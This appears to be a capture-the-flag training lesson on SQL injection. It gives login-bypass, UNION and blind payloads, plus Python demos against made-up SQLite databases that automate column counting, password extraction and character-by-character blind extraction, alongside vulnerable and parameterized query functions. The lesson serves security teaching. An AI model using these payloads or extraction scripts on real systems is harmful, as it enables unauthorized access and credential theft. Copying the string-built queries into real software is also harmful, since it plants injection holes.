Intermediate Track
3 hours
SQL Injection Deep Dive
4 guided sections and curated resources to get you contest-ready.
Lesson Playbook
4 sections
1
SQLi in CTFs
SQL injection is a vulnerability where untrusted input is concatenated into a SQL query and changes the query's structure, so the input is executed as SQL instead of being compared as a plain value.
In training/CTF apps, SQLi typically appears in:
- login forms
- search queries
- numeric IDs like ?id=123
Only test SQLi in environments you are authorized to test.
2
String vs Number Context
Your payload depends on how the parameter is embedded in the query: bare in a numeric comparison, or inside a quoted string literal.
# Numeric context: the query becomes WHERE id = 1 OR 1=1, no quote needed
?id=1 OR 1=1
# String context: the quote closes the literal, -- comments out the rest
?user=admin' --
?user=' OR '1'='1' --
Pro tip: Start with a single quote probe `'` and observe response differences (error page, empty result, changed length). Caveat for MySQL: `--` only starts a comment when followed by whitespace, and URL handling often strips a trailing space, so use `--+`, `-- -` or `#` there.
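Added example, not part of the lesson: the two contexts run against a constructed in-memory SQLite database through Python's sqlite3 module. `login_vulnerable` and `lookup_vulnerable` build the query by string formatting exactly as the payloads above assume, `quote_probe` shows what the single-quote probe detects, and `login_safe` / `lookup_safe` are the hardened forms. The table, rows and function names are made up for the demo.

```python
import sqlite3

# Constructed sample database for the demo (not from the lesson).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!');
        INSERT INTO users VALUES (2, 'alice', 'wonderland');
    """)
    return conn

def login_vulnerable(conn, username, password):
    """String context: the quotes are part of the SQL text, so a quote in the
    input closes the literal early and whatever follows is parsed as SQL."""
    query = f"SELECT username FROM users WHERE username = '{username}' AND password = '{password}'"
    return [row[0] for row in conn.execute(query)]

def lookup_vulnerable(conn, user_id):
    """Numeric context: no quotes around the value, so the payload needs none."""
    query = f"SELECT username FROM users WHERE id = {user_id}"
    return [row[0] for row in conn.execute(query)]

def quote_probe(conn, username):
    """The single-quote probe: True when one stray quote breaks the query,
    the first hint that input reaches SQL unescaped."""
    try:
        login_vulnerable(conn, username, "x")
        return False
    except sqlite3.OperationalError:
        return True

def login_safe(conn, username, password):
    """Hardened form: placeholders bind the input as data, never as SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]

def lookup_safe(conn, user_id):
    """Hardened numeric lookup: reject anything that is not an integer,
    then still bind it as a parameter."""
    try:
        value = int(user_id)
    except (TypeError, ValueError):
        return []
    query = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(query, (value,))]

if __name__ == "__main__":
    db = make_db()
    print("probe broke query:", quote_probe(db, "'"))
    print("admin' -- logs in as:", login_vulnerable(db, "admin' --", "wrong"))
    print("' OR '1'='1' -- returns:", login_vulnerable(db, "' OR '1'='1' --", "wrong"))
    print("1 OR 1=1 returns:", lookup_vulnerable(db, "1 OR 1=1"))
    print("safe login with payload:", login_safe(db, "admin' --", "wrong"))
    print("safe lookup with payload:", lookup_safe(db, "1 OR 1=1"))
```

SQLite accepts `--` without a trailing space, which is why the payloads work verbatim here; on MySQL the same payloads need `-- ` or `#`, so always confirm the comment syntax of the target engine before trusting a negative result.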
3
UNION Pattern
If the app reflects rows in the response, UNION-based extraction is common. The injected SELECT must return the same number of columns as the original query, and an id that matches nothing (?id=-1) leaves only the UNION rows in the page.
Typical flow:
- determine column count
- find reflected columns
- extract (CTF/sandbox only)
# Find column count: ORDER BY n succeeds until n exceeds the number of columns
?id=1 ORDER BY 1--
?id=1 ORDER BY 2--
# UNION with NULLs: NULL is compatible with any column type, so add NULLs until the error goes away
?id=-1 UNION SELECT NULL,NULL,NULL--
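Added example, not part of the lesson: the three-step UNION flow automated against a constructed SQLite database. `page` is a simulated vulnerable endpoint that concatenates `?id=` into the query and renders name and description but never price, so only two of three columns are reflected. The ORDER BY error and UNION behaviour shown are SQLite's; error text differs between engines, but the pattern is the same. Table and column names are made up for the demo.

```python
import sqlite3

# Constructed sample database for the demo (not from the lesson): products backs
# the page, users is the table we want to pull out through the UNION.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 9.99, 'A standard widget');
        INSERT INTO products VALUES (2, 'Gadget', 19.99, 'A fancy gadget');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!');
        INSERT INTO users VALUES (2, 'alice', 'wonderland');
    """)
    return conn

def page(conn, product_id):
    """Simulated vulnerable endpoint: ?id= is concatenated into the query.
    Name and description are rendered, price is not, so only two of the
    three selected columns are reflected in the response."""
    query = f"SELECT name, price, description FROM products WHERE id = {product_id}"
    rows = conn.execute(query).fetchall()
    return [f"{name}: {description}" for name, _price, description in rows]

def find_column_count(fetch, limit=20):
    """ORDER BY n works while n <= column count and errors once n exceeds it."""
    for n in range(1, limit + 1):
        try:
            fetch(f"1 ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count exceeds limit")

def find_reflected_columns(fetch, ncols):
    """Inject a distinct marker per column; the markers that show up in the
    page tell us which UNION slots are usable for extraction."""
    markers = ", ".join(f"'mark{i}'" for i in range(ncols))
    body = "\n".join(fetch(f"-1 UNION SELECT {markers}--"))
    return [i for i in range(ncols) if f"mark{i}" in body]

def extract(fetch, ncols, reflected, columns, table):
    """Put the wanted columns into reflected slots and NULL everywhere else.
    id=-1 matches nothing, so only the UNION rows come back."""
    slots = ["NULL"] * ncols
    for slot, column in zip(reflected, columns):
        slots[slot] = column
    return sorted(fetch(f"-1 UNION SELECT {', '.join(slots)} FROM {table}--"))

def run_demo():
    conn = make_db()
    fetch = lambda product_id: page(conn, product_id)
    ncols = find_column_count(fetch)
    reflected = find_reflected_columns(fetch, ncols)
    rows = extract(fetch, ncols, reflected, ["username", "password"], "users")
    return ncols, reflected, rows

if __name__ == "__main__":
    print(run_demo())
```

The `-1 UNION SELECT NULL,NULL,NULL--` probe from the lesson is the other way to get the column count: start with one NULL and add more until the query stops erroring. The marker step matters because a column that the page never renders (price here) is useless as an extraction slot even though it exists in the query.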
4
Blind SQLi
If results aren't reflected, you can still infer information one true/false answer at a time:
- boolean-based: response content changes when the condition is true
- time-based: the response is delayed when the condition is true
Compare responses on something measurable (status code, body length, a marker string, elapsed time) rather than by eye, and expect to automate: every character costs several requests.
# Boolean-based idea
?id=1 AND 1=1
?id=1 AND 1=2
# Time-based idea (MySQL; remember the trailing -- needs whitespace after it, e.g. --+ in a URL)
?id=1 AND IF(1=1, SLEEP(2), 0)--
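Added example, not part of the lesson: both blind techniques against a constructed SQLite database. `BlindApp` is a simulated endpoint that only reveals whether a product matched. The boolean oracle drives a binary search on `LENGTH()` and `UNICODE(SUBSTR())` so each character costs about seven requests instead of up to 95. SQLite has no `SLEEP()` or `IF()`, so the block registers a stand-in `SLEEP` user function (an assumption standing in for MySQL's) and uses `CASE WHEN` in place of `IF(cond, SLEEP(n), 0)`. Table names, the secret and the request counter are all made up for the demo.

```python
import sqlite3
import time

# Constructed sample database for the demo (not from the lesson).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'Widget');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!');
    """)
    # Assumption: SQLite has no SLEEP(); this stand-in mimics MySQL's
    # SLEEP(seconds) (sleep, then return 0) so the time-based idea runs here.
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    return conn

class BlindApp:
    """Simulated blind endpoint: ?id= is concatenated into the query and the
    response only says whether a product matched. Requests are counted so the
    cost of the extraction is visible."""
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def found(self, product_id):
        self.requests += 1
        query = f"SELECT id FROM products WHERE id = {product_id}"
        return self.conn.execute(query).fetchone() is not None

def boolean_oracle(app, condition):
    """Boolean-based: the row comes back only when the injected condition holds."""
    return app.found(f"1 AND ({condition})--")

def time_oracle(app, condition, delay=0.3):
    """Time-based: same condition, but the signal is elapsed time. CASE WHEN
    stands in for MySQL's IF(cond, SLEEP(n), 0)."""
    start = time.monotonic()
    app.found(f"1 AND (CASE WHEN ({condition}) THEN SLEEP({delay}) ELSE 0 END)--")
    return time.monotonic() - start >= delay / 2

def search_int(ask_gt, lo, hi):
    """Binary search over [lo, hi]; ask_gt(v) answers 'is the hidden value > v?'.
    Roughly log2(hi - lo) oracle calls instead of one per candidate value."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask_gt(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract_blind(oracle, subquery, max_len=64):
    """Recover the single string that subquery returns, one character at a time:
    first its length, then the code point at each position."""
    length = search_int(lambda v: oracle(f"LENGTH(({subquery})) > {v}"), 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = search_int(
            lambda v, i=i: oracle(f"UNICODE(SUBSTR(({subquery}), {i}, 1)) > {v}"), 0, 127)
        chars.append(chr(code))
    return "".join(chars)

# The value to pull out blindly (constructed for the demo).
SECRET_QUERY = "SELECT password FROM users WHERE username = 'admin'"

def run_boolean_demo():
    app = BlindApp(make_db())
    value = extract_blind(lambda cond: boolean_oracle(app, cond), SECRET_QUERY)
    return value, app.requests

def run_time_demo():
    app = BlindApp(make_db())
    return time_oracle(app, "1=1"), time_oracle(app, "1=2")

if __name__ == "__main__":
    print("boolean-based:", run_boolean_demo())
    print("time-based (true, false):", run_time_demo())
```

Swapping `boolean_oracle` for `time_oracle` in `extract_blind` turns the same search into a time-based extraction; in practice the timing threshold needs to sit well above the target's normal latency jitter, and the delay should be kept as short as the network allows because it is paid on every true answer.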